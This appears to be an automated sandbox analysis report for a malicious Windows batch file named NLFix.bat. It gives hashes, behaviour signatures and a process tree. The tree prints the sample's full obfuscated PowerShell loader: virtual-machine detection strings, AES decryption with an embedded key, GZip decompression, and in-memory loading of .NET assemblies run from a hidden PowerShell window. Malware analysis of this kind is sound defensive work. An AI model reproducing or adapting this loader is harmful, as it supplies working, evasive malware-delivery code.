Analysis
-
max time kernel
121s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
31-12-2024 21:54
Static task
static1
Behavioral task
behavioral1
Sample
NLFix.bat
Resource
win7-20241010-en
windows7-x64
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
NLFix.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
28 signatures
150 seconds
General
-
Target
NLFix.bat
-
Size
7.3MB
-
MD5
398c1f578d2d3a043041299f023603b8
-
SHA1
2416a7340c1bc2313d0c1a446e6bf6c70c673181
-
SHA256
9d180dd0b5067c595c8c4c94e9a3098fb62ab8d0fe9ab451a32fcd4f6e3b6bdf
-
SHA512
0a011639ae0c73c9ad335bccef27e8fecdb44c5a33bb136de2136801b9f319fa597ba2f6dd8a5f45b963703fdd26541938190630da0e45ec47a3571178ce6041
-
SSDEEP
49152:jfpqzii39LrgimomcMzBV6FJ6BFN1rBW7BIVGJ0FnyqcYkThNjQsItYBHIlDpPOQ:L
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2920 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2920 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2920 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 564 wrote to memory of 1452 564 cmd.exe 31 PID 564 wrote to memory of 1452 564 cmd.exe 31 PID 564 wrote to memory of 1452 564 cmd.exe 31 PID 564 wrote to memory of 1396 564 cmd.exe 32 PID 564 wrote to memory of 1396 564 cmd.exe 32 PID 564 wrote to memory of 1396 564 cmd.exe 32 PID 564 wrote to memory of 2784 564 cmd.exe 33 PID 564 wrote to memory of 2784 564 cmd.exe 33 PID 564 wrote to memory of 2784 564 cmd.exe 33 PID 564 wrote to memory of 2780 564 cmd.exe 34 PID 564 wrote to memory of 2780 564 cmd.exe 34 PID 564 wrote to memory of 2780 564 cmd.exe 34 PID 564 wrote to memory of 2912 564 cmd.exe 35 PID 564 wrote to memory of 2912 564 cmd.exe 35 PID 564 wrote to memory of 2912 564 cmd.exe 35 PID 564 wrote to memory of 2920 564 cmd.exe 36 PID 564 wrote to memory of 2920 564 cmd.exe 36 PID 564 wrote to memory of 2920 564 cmd.exe 36
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\NLFix.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Windows\system32\fsutil.exefsutil fsinfo drives2⤵PID:1452
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A"2⤵PID:1396
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives2⤵PID:2784
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"2⤵PID:2780
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function hTng($IsJP){ Invoke-Expression -Debug -Verbose -WarningAction Inquire '$sPuv=[BRSBRysBRtBRemBR.BRSeBRcBRuBRrBRiBRtBRy.BRCBRrBRyBRptBRoBRgBRrBRaBRpBRhBRyBR.ABReBRsBR]BR:BR:BRCrBReBRaBRteBR(BR);'.Replace('BR', ''); Invoke-Expression -WarningAction Inquire '$sPuv.MBvoBvdeBv=Bv[SBvyBvstBveBvmBv.BvSBveBvcuBvrBviBvtBvy.BvCBvrBvyBvpBvtBvoBvgBvraBvpBvhBvyBv.BvCBvipBvhBveBvrMBvoBvdeBv]:Bv:BvCBBvC;'.Replace('Bv', ''); Invoke-Expression -WarningAction Inquire '$sPuv.PkYakYddkYikYngkY=kY[SkYykYskYtkYekYmkY.SkYekYckYukYrikYtkYykY.kYCkYrkYykYpkYtokYgkYrkYakYpkYhkYy.kYPkYakYddkYikYngkYMokYdkYe]kY::kYPkYKkYCSkY7;'.Replace('kY', ''); Invoke-Expression -WarningAction Inquire '$sPuv.KGneGny=Gn[GnSyGnsGnteGnmGn.GnCGnoGnnGnveGnrGntGn]Gn::GnFGnrGnoGnmGnBGnaGnsGne6Gn4GnSGntGnrGniGnngGn("AGnHGnTkGnyGnERGnaGnOhGnvGnRGnPGnSGnKGn/6GncGnDGnAGnWBGn+GnDGnDGnnGnHGnrGn9GnfAGnLGneGnNGnqGncGnPxGnfGnYGn/rGnwGn=");'.Replace('Gn', ''); Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore '$sPuv.IpgVpg=[pgSpgyspgtpgempg.pgCpgopgnpgvpgerpgtpg]pg:pg:FpgrpgopgmpgBpgapgspgepg64pgSpgtpgrpgipgnpgg("ipgKpgEzpgYpgg1pgVpghmpgYpgCpgEpg1pgVpg+NpgFpgLpgNpg7wpg=pg=pg");'.Replace('pg', ''); $VInP=$sPuv.CreateDecryptor(); $bwph=$VInP.TransformFinalBlock($IsJP, 0, $IsJP.Length); $VInP.Dispose(); $sPuv.Dispose(); $bwph;}function bInQ($IsJP){ Invoke-Expression -WarningAction Inquire -Debug -Verbose -InformationAction Ignore '$zkFu=NmOemOw-mOOmObjmOemOctmO mOSmOymOsmOtmOemmO.mOImOOmO.MmOemOmmOomOrmOymOSmOtmOremOamOm(,$IsJP);'.Replace('mO', ''); Invoke-Expression -Verbose -InformationAction Ignore -Debug -WarningAction Inquire '$MYrS=NmOemOw-mOOmObjmOemOctmO mOSmOymOsmOtmOemmO.mOImOOmO.MmOemOmmOomOrmOymOSmOtmOremOamOm;'.Replace('mO', ''); Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$YLrW=NQOeQOw-QOOQObjQOeQOctQO QOSQOyQOsQOtQOemQO.QOIQOOQO.CQOoQOmQOpQOrQOeQOsQOsQOioQOnQO.QOGQOZQOiQOpSQOtQOrQOeaQOmQO($zkFu, [QOIQOO.QOCQOomQOpQOreQOsQOsQOiQOoQOnQO.CQOoQOmQOpQOreQOsQOsQOiQOoQOnQOMQOoQOdeQO]QO:QO:QODQOeQOcoQOmQOpQOreQOsQOs);'.Replace('QO', ''); $YLrW.CopyTo($MYrS); $YLrW.Dispose(); $zkFu.Dispose(); $MYrS.Dispose(); $MYrS.ToArray();}function QhCd($IsJP,$kyeK){ Invoke-Expression -InformationAction Ignore -WarningAction Inquire '$VyZj=[kWSkWyskWtkWemkW.kWRekWfkWlkWekWckWtkWiokWnkW.kWAkWsskWekWmkWbkWlkWykW]kW:kW:LkWokWakWd([byte[]]$IsJP);'.Replace('kW', ''); Invoke-Expression -Debug -Verbose '$DDiX=$VyZj.EhpnhptrhpyhpPohpihpnthp;'.Replace('hp', ''); Invoke-Expression -Debug '$DDiX.TaITanvTaoTakeTa(Ta$nTauTalTalTa, $kyeK);'.Replace('Ta', '');}$UIKC = 'C:\Users\Admin\AppData\Local\Temp\NLFix.bat';$host.UI.RawUI.WindowTitle = $UIKC;$qAaR=[System.IO.File]::ReadAllText($UIKC).Split([Environment]::NewLine);foreach ($LPaK in $qAaR) { if ($LPaK.StartsWith('phDUy')) { $YxYD=$LPaK.Substring(5); break; }}$glGL=[string[]]$YxYD.Split('\');Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore '$Yok = bInQ (hTng ([aZCaZonaZvaZeraZtaZ]:aZ:aZFaZraZoaZmaZBaaZsaZeaZ6aZ4SaZtaZraZiaZnaZg($glGL[0].Replace("#", "/").Replace("@", "A"))));'.Replace('aZ', '');Invoke-Expression -Verbose -Debug '$Jcq = bInQ (hTng ([aZCaZonaZvaZeraZtaZ]:aZ:aZFaZraZoaZmaZBaaZsaZeaZ6aZ4SaZtaZraZiaZnaZg($glGL[1].Replace("#", "/").Replace("@", "A"))));'.Replace('aZ', '');Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose -Debug '$Prj = bInQ (hTng ([aZCaZonaZvaZeraZtaZ]:aZ:aZFaZraZoaZmaZBaaZsaZeaZ6aZ4SaZtaZraZiaZnaZg($glGL[2].Replace("#", "/").Replace("@", "A"))));'.Replace('aZ', '');QhCd $Yok $null;QhCd $Jcq $null;QhCd $Prj (,[string[]] (''));2⤵PID:2912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2920
-